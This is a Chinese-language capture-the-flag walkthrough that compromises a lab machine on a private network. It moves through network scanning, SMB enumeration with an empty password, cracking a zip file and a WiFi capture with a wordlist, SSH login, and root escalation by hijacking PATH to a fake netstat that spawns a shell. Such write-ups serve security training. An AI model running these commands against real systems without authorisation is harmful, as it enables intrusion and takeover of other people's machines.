主机发现
1 netdiscover -i eth0 -r 192.168.170.0/24
端口扫描
1 nmap -sV 192.168.170.145
访问80端口,提示使用smb攻击
目录扫描,未发现有价值的信息
1 dirb http://192.168.170.145/
SMB渗透
SMB是一个网络协议名,它能被用于Web连接和客户端与服务器之间的信息沟通,允许应用程序和终端用户从远端的文件服务器访问文件资源
查询靶机中的用户
1 enum4linux -U 192.168.170.145
enum4linux是用于枚举系统上的SMB服务的工具,可以轻松的从与SMB服务有关的目标中快速提取信息
爆破smb用户的密码,密码为空
1 acccheck -t 192.168.170.145 -u smb -v
枚举靶机的共享资源
1 smbmap -u 'smb' -p '' -H 192.168.170.145
查看靶机的共享目录
1 smbclient -L 192.168.170.145 -U smb
通过SMB登录靶机
1 smbclient //192.168.170.145/print$ -U smb
发现文件全是0字节,但是还有一个.目录,尝试进入
1 smbclient //192.168.170.145/smb -U smb
下载main.txt查看内容,无有用信息
1 get main.txt
下载safe.zip进行解压
1 get safe.zip
发现需要密码,破解得到密码为hacker1
1 fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip
解压得到两个文件,secret.jpg和user.cap,打开图片未发现有用信息,然后打开流量包发现是个无线数据包,wifi名称为blackjax
使用aircrack-ng破解user.cap文件,得到密码为snowflake
1 aircrack-ng -w /usr/share/wordlists/rockyou.txt user.cap
登录ssh,得到第一个flag
1 ssh blackjax@192.168.170.145 -p 2525
发现该用户不能执行sudo
查看系统中带SUID的程序
1 find / -user root -perm -4000 -print 2>/dev/null
执行netscan命令
下载并分析该文件,发现它调用了execve函数执行了netstat -antp命令
1 scp -P 2525 blackjax@192.168.170.145:/usr/bin/netscan /tmp 2 strace -f /tmp/netscan
通过劫持环境变量来让netscan在执行时执行其他命令
1 #tmp有写权限 2 echo "/bin/sh" > /tmp/netstat 3 chmod 777 /tmp/netstat 4 export PATH=/tmp:$PATH 5 netscan
成功提权,得到第二个flag
